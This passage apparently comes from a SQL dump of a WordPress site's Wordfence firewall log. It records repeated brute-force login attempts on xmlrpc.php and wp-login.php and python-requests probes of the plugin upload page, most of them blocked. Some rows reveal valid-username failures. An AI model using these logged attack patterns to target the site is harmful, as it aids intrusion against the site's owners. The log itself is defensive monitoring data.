Network',NULL),(12448,0.000000,1631455465.584095,'\0\0\0\0\0\0\0\0\0\0��gQW',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12449,0.000000,1631455820.115234,'\0\0\0\0\0\0\0\0\0\0��MD ',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12450,0.000000,1631455859.101212,'\0\0\0\0\0\0\0\0\0\0��g�t2',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12451,0.000000,1631456242.659019,'\0\0\0\0\0\0\0\0\0\0��k�g�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12452,0.000000,1631456376.837045,'\0\0\0\0\0\0\0\0\0\0���H�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12453,0.000000,1631456631.907951,'\0\0\0\0\0\0\0\0\0\0��P8',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12454,0.000000,1631456955.655921,'\0\0\0\0\0\0\0\0\0\0���Dg�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12455,0.000000,1631456998.372935,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12456,0.000000,1631457387.794828,'\0\0\0\0\0\0\0\0\0\0��\"@�f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12457,0.000000,1631457570.178468,'\0\0\0\0\0\0\0\0\0\0�����_',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12458,0.000000,1631457795.494198,'\0\0\0\0\0\0\0\0\0\0��4�w%',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12459,0.000000,1631458101.868828,'\0\0\0\0\0\0\0\0\0\0���h�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12460,0.000000,1631459231.512861,'\0\0\0\0\0\0\0\0\0\0����:',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12461,0.000000,1631459823.381333,'\0\0\0\0\0\0\0\0\0\0���B��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12462,0.000000,1631460442.407687,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12463,0.000000,1631460448.844643,'\0\0\0\0\0\0\0\0\0\0����`',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12464,0.000000,1631461312.296773,'\0\0\0\0\0\0\0\0\0\0��E�S',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12465,1631461313.831816,1631461313.601900,'\0\0\0\0\0\0\0\0\0\0��E�S',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12466,0.000000,1631461656.649761,'\0\0\0\0\0\0\0\0\0\0��mꠙ',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12467,0.000000,1631461661.314391,'\0\0\0\0\0\0\0\0\0\0����^�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12468,0.000000,1631462186.698584,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12469,0.000000,1631462547.563369,'\0\0\0\0\0\0\0\0\0\0���6�E',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12470,1631462548.994167,1631462548.917900,'\0\0\0\0\0\0\0\0\0\0���6�E',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12471,0.000000,1631462772.526263,'\0\0\0\0\0\0\0\0\0\0��ν.�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12472,0.000000,1631463168.935075,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12473,0.000000,1631463337.116725,'\0\0\0\0\0\0\0\0\0\0��mꠙ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12474,0.000000,1631463933.200157,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12475,0.000000,1631464319.731830,'\0\0\0\0\0\0\0\0\0\0����~h',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12476,0.000000,1631464556.427116,'\0\0\0\0\0\0\0\0\0\0��UX�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12477,0.000000,1631465134.095515,'\0\0\0\0\0\0\0\0\0\0��_o��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12478,0.000000,1631465615.895337,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12479,0.000000,1631465659.868601,'\0\0\0\0\0\0\0\0\0\0����h',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12480,0.000000,1631466541.132485,'\0\0\0\0\0\0\0\0\0\0��)�H�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12481,0.000000,1631467042.651100,'\0\0\0\0\0\0\0\0\0\0�����q',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12482,0.000000,1631467154.304683,'\0\0\0\0\0\0\0\0\0\0���Dg�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12483,0.000000,1631467796.575613,'\0\0\0\0\0\0\0\0\0\0��g|_h',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12484,0.000000,1631468179.784941,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12485,0.000000,1631468198.516925,'\0\0\0\0\0\0\0\0\0\0��E77t',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12486,1631468201.248504,1631468200.286800,'\0\0\0\0\0\0\0\0\0\0��E77t',0,503,0,0,0,'https://www.bournesociety.org.uk//wp-login.php','https://www.bournesociety.org.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1sb2dpbi5waHA=\"}'),(12487,0.000000,1631468427.722412,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12488,0.000000,1631468989.152086,'\0\0\0\0\0\0\0\0\0\0��\r~r�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12489,0.000000,1631469285.675986,'\0\0\0\0\0\0\0\0\0\0����Ù',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12490,0.000000,1631469620.760076,'\0\0\0\0\0\0\0\0\0\0��UX�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12491,0.000000,1631470202.823119,'\0\0\0\0\0\0\0\0\0\0���V{�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12492,0.000000,1631470606.391452,'\0\0\0\0\0\0\0\0\0\0��\"DL ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12493,0.000000,1631470807.371130,'\0\0\0\0\0\0\0\0\0\0��g|^,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12494,0.000000,1631471407.696377,'\0\0\0\0\0\0\0\0\0\0���b�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12495,0.000000,1631471713.351894,'\0\0\0\0\0\0\0\0\0\0����p�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12496,0.000000,1631472037.933827,'\0\0\0\0\0\0\0\0\0\0��ν.�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12497,0.000000,1631472595.703298,'\0\0\0\0\0\0\0\0\0\0����h',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12498,0.000000,1631472809.298943,'\0\0\0\0\0\0\0\0\0\0��R@�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12499,0.000000,1631473225.320348,'\0\0\0\0\0\0\0\0\0\0����6',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12500,0.000000,1631474217.923009,'\0\0\0\0\0\0\0\0\0\0���I�-',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12501,0.000000,1631474384.586948,'\0\0\0\0\0\0\0\0\0\0��tʡ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12502,0.000000,1631474927.199316,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12503,0.000000,1631474978.063705,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12504,1631474991.589445,1631474991.499200,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12505,1631475019.307577,1631475019.217400,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12506,1631475005.125482,1631475005.042300,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12507,1631475032.697871,1631475032.517100,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12508,0.000000,1631476217.360581,'\0\0\0\0\0\0\0\0\0\0��3�Ub',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12509,0.000000,1631476571.051878,'\0\0\0\0\0\0\0\0\0\0���]n\'',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12510,0.000000,1631476824.342522,'\0\0\0\0\0\0\0\0\0\0���S��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12511,0.000000,1631477478.853257,'\0\0\0\0\0\0\0\0\0\0��ȉ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12512,0.000000,1631477961.684525,'\0\0\0\0\0\0\0\0\0\0���Gǫ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12513,0.000000,1631478662.958728,'\0\0\0\0\0\0\0\0\0\0��l�r',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12514,0.000000,1631478759.437356,'\0\0\0\0\0\0\0\0\0\0��#��v',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12515,0.000000,1631479318.873608,'\0\0\0\0\0\0\0\0\0\0��\"F]',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12516,0.000000,1631479780.910314,'\0\0\0\0\0\0\0\0\0\0��\"]$d',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12517,0.000000,1631479817.388701,'\0\0\0\0\0\0\0\0\0\0����)D',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(12518,0.000000,1631480532.031519,'\0\0\0\0\0\0\0\0\0\0���:�3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12519,0.000000,1631480871.948351,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12520,0.000000,1631481151.303669,'\0\0\0\0\0\0\0\0\0\0��3QJ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12521,0.000000,1631481903.680730,'\0\0\0\0\0\0\0\0\0\0���j �',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12522,0.000000,1631482926.537476,'\0\0\0\0\0\0\0\0\0\0���D�\0',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12523,0.000000,1631483763.682888,'\0\0\0\0\0\0\0\0\0\0��_o��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12524,0.000000,1631483770.579084,'\0\0\0\0\0\0\0\0\0\0����e�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(12525,0.000000,1631483934.144651,'\0\0\0\0\0\0\0\0\0\0����Ù',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12526,0.000000,1631484296.057110,'\0\0\0\0\0\0\0\0\0\0���6�;',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12527,1631484304.071599,1631484303.976800,'\0\0\0\0\0\0\0\0\0\0���6�;',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12528,0.000000,1631484420.567451,'\0\0\0\0\0\0\0\0\0\0���ɬL',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12529,0.000000,1631484831.374821,'\0\0\0\0\0\0\0\0\0\0�����V',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12530,1631484832.726543,1631484832.648700,'\0\0\0\0\0\0\0\0\0\0�����V',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12531,0.000000,1631485821.877413,'\0\0\0\0\0\0\0\0\0\0��3QQ\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12532,0.000000,1631485989.653519,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12533,0.000000,1631486567.530310,'\0\0\0\0\0\0\0\0\0\0����\\\\',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12534,0.000000,1631487006.041298,'\0\0\0\0\0\0\0\0\0\0���aD�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by 